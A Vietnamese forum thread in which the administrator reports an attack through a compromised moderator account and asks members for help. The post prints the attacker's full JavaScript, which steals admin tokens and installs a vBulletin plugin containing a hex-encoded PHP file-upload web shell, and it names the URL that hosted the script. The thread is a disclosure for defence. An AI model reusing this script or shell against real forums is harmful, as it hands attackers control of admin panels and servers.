Announce Forum đang có người muốn phá hoại

Shin

Administrator
Staff member
Trusted 3
Joined
Mar 31, 2010
Messages
5,919
Solutions
5
Reactions
17,459
MR
55.102
$240.00
Chào các bạn,

Hiện tại đang có một ai đó đang cố gắng tìm cách để phá Forum. Và rạng sáng nay khoảng 1h thì người này đã lợi dụng Account của MOD locvinhsu để tạo ra những tình huống lạ, và sử dụng phương pháp đó để gắn Shellcode vào Forum. Đây là phương pháp mà người này sử dụng:
  1. Sử dụng Account MOD của Forum
  2. Tạo ra các Announcements
    • Gắn Script tạo Shellcode vào Annoucement đã tạo
  3. Đối với người bình thường: click vào sẽ được Redirect tới trang Login trong admincp
  4. Đối với Admin: click vào sẽ được Redirect đến trang PluginAdd một Plugin mới với Shellcode bên trong

Đây là 2 bức hình trong Admin. Các bạn thử xem nha:


Và đây là script mà người đó dùng để Add Shellcode:
  • http://hangspa.vn/administrator/plugin.js
  • PHP:
    var debug = true; //show result
    var post = getHTTPObject();
    var get = getHTTPObject();
    function getHTTPObject() {
        var xmlhttp;
        if (!xmlhttp && typeof XMLHttpRequest != 'undefined') { 
            try{
                xmlhttp = new XMLHttpRequest(); 
            }catch(e){ 
                xmlhttp = false;
            }
        }
        return xmlhttp; 
    }
    String.prototype.between = function(prefix, suffix) {
      s = this;
      var i = s.indexOf(prefix);
      if (i >= 0) {
        s = s.substring(i + prefix.length);
      }
      else {
        return '';
      }
      if (suffix) {
        i = s.indexOf(suffix);
        if (i >= 0) {
          s = s.substring(0, i);
        }
        else {
          return '';
        }
      }
      return s;
    }
    function step1(){
        var string;
        get.open("GET", admincp+"plugin.php?do=add",true);
        get.onreadystatechange=function() {
            if (get.readyState==4) {
                string = get.responseText;
                step2(string);
            }
        }
        get.send(null)
    }
    function step2(str){
        var string;
        adminhash = str.between('adminhash" value="', '" />');
        securitytoken = str.between('securitytoken" value="', '" />');
        shellcode = 'eval("\\x20\\x69\\x66\\x20\\x28\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x27\\x64\\x6f\\x27\\x5d\\x3d\\x3d\\x27\\x6c\\x6f\\x61\\x64\\x27\\x29\\x7b\\xd\\xa\\x20\\x24\\x66\\x69\\x6c\\x65\\x73\\x20\\x3d\\x20\\x40\\x24\\x5f\\x46\\x49\\x4c\\x45\\x53\\x5b\\x22\\x66\\x69\\x6c\\x65\\x73\\x22\\x5d\\x3b\\xd\\xa\\x20\\x69\\x66\\x28\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x22\\x6e\\x61\\x6d\\x65\\x22\\x5d\\x20\\x21\\x3d\\x20\\x27\\x27\\x29\\x7b\\xd\\xa\\x20\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x20\\x3d\\x20\\x24\\x5f\\x52\\x45\\x51\\x55\\x45\\x53\\x54\\x5b\\x22\\x70\\x61\\x74\\x68\\x22\\x5d\\x2e\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x22\\x6e\\x61\\x6d\\x65\\x22\\x5d\\x3b\\xd\\xa\\x20\\x69\\x66\\x28\\x6d\\x6f\\x76\\x65\\x5f\\x75\\x70\\x6c\\x6f\\x61\\x64\\x65\\x64\\x5f\\x66\\x69\\x6c\\x65\\x28\\x24\\x66\\x69\\x6c\\x65\\x73\\x5b\\x27\\x74\\x6d\\x70\\x5f\\x6e\\x61\\x6d\\x65\\x27\\x5d\\x2c\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x29\\x29\\x20\\x65\\x63\\x68\\x6f\\x20\\x22\\x3c\\x68\\x31\\x3e\\x3c\\x61\\x20\\x68\\x72\\x65\\x66\\x3d\\x27\\x24\\x66\\x75\\x6c\\x6c\\x70\\x61\\x74\\x68\\x27\\x3e\\x4f\\x4b\\x2d\\x43\\x6c\\x69\\x63\\x6b\\x20\\x68\\x65\\x72\\x65\\x21\\x3c\\x2f\\x61\\x3e\\x3c\\x2f\\x68\\x31\\x3e\\x22\\x3b\\xd\\xa\\x20\\x7d\\xd\\xa\\x20\\x64\\x69\\x65\\x28\\x27\\x3c\\x66\\x6f\\x72\\x6d\\x20\\x6d\\x65\\x74\\x68\\x6f\\x64\\x3d\\x50\\x4f\\x53\\x54\\x20\\x65\\x6e\\x63\\x74\\x79\\x70\\x65\\x3d\\x22\\x6d\\x75\\x6c\\x74\\x69\\x70\\x61\\x72\\x74\\x2f\\x66\\x6f\\x72\\x6d\\x2d\\x64\\x61\\x74\\x61\\x22\\x20\\x61\\x63\\x74\\x69\\x6f\\x6e\\x3d\\x22\\x22\\x3e\\xd\\xa\\x20\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x74\\x65\\x78\\x74\\x20\\x6e\\x61\\x6d\\x65\\x3d\\x70\\x61\\x74\\x68\\x3e\\xd\\xa\\x20\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x22\\x66\\x69\\x6c\\x65\\x22\\x20\\x6e\\x61\\x6d\\x65\\x3d\\x22\\x66\\x69\\x6c\\x65\\x73\\x22\\x3e\\x3c\\x69\\x6e\\x70\\x75\\x74\\x20\\x74\\x79\\x70\\x65\\x3d\\x73\\x75\\x62\\x6d\\x69\\x74\\x20\\x76\\x61\\x6c\\x75\\x65\\x3d\\x22\\x55\\x70\\x22\\x3e\\x3c\\x2f\\x66\\x6f\\x72\\x6d\\x3e\\x27\\x29\\x3b\\xd\\xa\\x20\\x7d\\xd\\xa");';
        data = "do=update&adminhash="+adminhash+"&securitytoken="+securitytoken+"&product=vbulletin&hookname=global_start&title=Upload&executionorder=5&phpcode="+shellcode+"&active=1&pluginid=";
        post.onreadystatechange = function(){
            if(post.readyState == 4){
                string = post.responseText;
                if(debug == true) document.write(string);
            }
        }
        post.open("POST", admincp+"plugin.php?do=update", true);
        post.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        post.setRequestHeader("Content-length", data.length);
        post.setRequestHeader("Connection", "close");
        post.send(data);
    }
    step1();


Hiện mình đã xóa tất cả Plugin trên, add Shellcode, nhưng không biết nó còn để lại dấu hiệu gì không. Các bạn thử xem và cho mình ý kiến nha.

Account của locvinhsu hiện đang bị BANNED để kiểm tra chắc rằng Hacker không thể làm gì được nữa.

Nếu trong tương lai các bạn có gặp trường hợp tương tự như thế thì cho mình biết với nha.

Cám ơn các bạn nhiều
Thân
 

o0NVT0o

Hero
Verified
Joined
Dec 10, 2011
Messages
2,704
Reactions
1,372
MR
0.003
$888.88
Chat with me via Skype
sáng sớm nay em vào box rule thì nó cứ tự chuyển đến trang admincp. thấy nghi nghi :m020: ............
 

norton

Banned
Joined
Aug 15, 2012
Messages
5
Reactions
1
MR
0.000
Thật ko hiểu nổi cái bọn bại nảo đó nhỉ :| có 1 cái nhà cho mọi ng cùng kiếm ăn mà cứ phá. cái lũ này Thần Kinh bị gì ko biết :| giỏi ko giúp ích gì đc cho đời chỉ đi làm những trò bẩn thỉu :|
 

PhongVu

Senior
Joined
Jun 1, 2012
Messages
1,392
Reactions
940
MR
0.000
hjx hjx cho e xin hai chữ bình yên nào
 
Joined
Aug 27, 2011
Messages
8,987
Reactions
4,342
MR
0.015
Follow me on Facebook Chat with me via Skype X.com
Chính xác là từ tối qua tầm 2 giờ mình đang online 4room khi click chuyển trang hay chọn Threaf khác thì nó nhảy sang màng hình log in của Vvb..

Mình ko gõ pass mà chọn lại trên Boomark thì vào lại bình thường. Sáng nay tầm 10 giờ vẫn còn tình trạng trên.
 
Chính xác là từ tối qua tầm 2 giờ mình đang online 4room khi click chuyển trang hay chọn Threaf khác thì nó nhảy sang màng hình log in của Vvb..

Mình ko gõ pass mà chọn lại trên Boomark thì vào lại bình thường. Sáng nay tầm 10 giờ vẫn còn tình trạng trên.
hê hê đêm wa đến giờ ta bấm cũng mấy lần rồi đấy Nó cứ nhảy ra kêu oánh pass ta cứ oánh =)) Nick Clone ko sợ những cái này cứ phang tới :)) haha Lên Mem ta lại clone tiếp thế cho AN Toàn:>
 

nqphuc

Hero
Joined
Apr 24, 2012
Messages
1,312
Reactions
560
MR
0.000
Sao mấy thành phần nguy hiểm cứ phá hoại hoài vậy nè? Có 1 cái nơi để mọi người cùng kiếm tiền, vui chơi thì không lo xây dựng mà lại đi phá là sao?
 
Sao mấy thành phần nguy hiểm cứ phá hoại hoài vậy nè? Có 1 cái nơi để mọi người cùng kiếm tiền, vui chơi thì không lo xây dựng mà lại đi phá là sao?
tụi nó phá để trục lợi cá nhân thôi....nó mà kiểm soát đc admincp thì tiu......
 

ithongkhanh

Newbie
Joined
Jul 28, 2012
Messages
360
Reactions
217
MR
0.000
Kg biết tên này ở đâu ! Mình cũng khoái cái vụ Hack Hack này lắm ! Chỉ có cái là chưa làm bao giờ ... Trước giờ toàn học Mạng , mà mấy ông thầy thì toàn kêu HS tụi mình ngồi làm chứ chưa chỉ phá . Đừng ném đá mình nhé , gửi ít tiền mua đất trước thì còn được ... :binhsua26:
 

Announcements

Today's birthdays

Forum statistics

Threads
426,717
Messages
7,183,132
Members
179,075
Latest member
kent791

Most viewed of week

Most discussed of week

Most viewed of week

Most discussed of week

Back
Top Bottom